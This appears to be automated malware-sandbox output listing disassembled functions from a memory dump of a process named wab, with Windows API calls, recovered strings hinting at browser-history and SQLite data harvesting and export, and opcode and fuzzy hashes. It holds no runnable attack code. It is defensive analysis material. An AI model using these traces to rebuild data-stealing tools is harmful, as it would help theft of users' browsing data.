  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
APIs
• memset.MSVCRT ref: 004185FC
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
• ??3@YAXPAX@Z.MSVCRT ref: 00418650
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@AttributesFilememset
• String ID:
• API String ID: 776155459-0
                                                                                                                                                                                                                      • Opcode ID: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2308052813-0
                                                                                                                                                                                                                      • Opcode ID: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PathTemp$??3@
                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                      • API String ID: 1589464350-1420421710
                                                                                                                                                                                                                      • Opcode ID: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                      • API String ID: 999786162-26480598
                                                                                                                                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2903831945-0
                                                                                                                                                                                                                      • Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1471605966-0
Uniqueness Score: -1.00%

APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy$??3@
• String ID: g4@
• API String ID: 3314356048-2133833424
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
